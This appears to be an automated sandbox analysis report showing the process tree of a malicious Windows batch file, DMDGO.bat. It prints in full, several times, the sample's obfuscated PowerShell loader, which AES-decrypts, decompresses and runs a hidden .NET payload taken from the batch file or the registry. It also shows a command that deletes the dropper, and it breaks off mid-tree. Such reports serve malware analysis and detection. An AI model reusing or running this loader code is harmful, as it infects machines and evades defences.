[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1732
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\DMDGO.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\DMDGO.bat.exe" & del /f "C:\Users\Admin\Downloads\DMDGO.bat.exe"
      4⤵
      PID:5664
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        5⤵
        Runs ping.exe
        
        PID:5384
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "C:\Users\Admin\Downloads\DMDGO.bat.exe"
        5⤵
        Kills process with taskkill
        
        PID:5628
    - - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s "C:\Users\Admin\Downloads\DMDGO.bat.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DMDGO.bat" "
  2⤵
  PID:3516
- - C:\Users\Admin\Downloads\DMDGO.bat.exe
    "DMDGO.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $nxdhd = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\DMDGO.bat').Split([Environment]::NewLine);foreach ($rTzZT in $nxdhd) { if ($rTzZT.StartsWith(':: ')) { $pCAAj = $rTzZT.Substring(3); break; }; };$ROVJm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pCAAj);$rlWJv = New-Object System.Security.Cryptography.AesManaged;$rlWJv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$rlWJv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$rlWJv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d2UWzdiZOTW5ZCshp72vi/mVJM4Qox0RYc8nklPpZvs=');$rlWJv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1G2XQl2tD4JzwuN8NXDAbw==');$daxDH = $rlWJv.CreateDecryptor();$ROVJm = $daxDH.TransformFinalBlock($ROVJm, 0, $ROVJm.Length);$daxDH.Dispose();$rlWJv.Dispose();$mliXE = New-Object System.IO.MemoryStream(, $ROVJm);$zgBXo = New-Object System.IO.MemoryStream;$RTyqi = New-Object System.IO.Compression.GZipStream($mliXE, [IO.Compression.CompressionMode]::Decompress);$RTyqi.CopyTo($zgBXo);$RTyqi.Dispose();$mliXE.Dispose();$zgBXo.Dispose();$ROVJm = $zgBXo.ToArray();$xxbYH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ROVJm);$rtDoN = $xxbYH.EntryPoint;$rtDoN.Invoke($null, (, [string[]] ('')))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4496
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1412
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1232
    - - C:\Windows\$sxr-powershell.exe
        
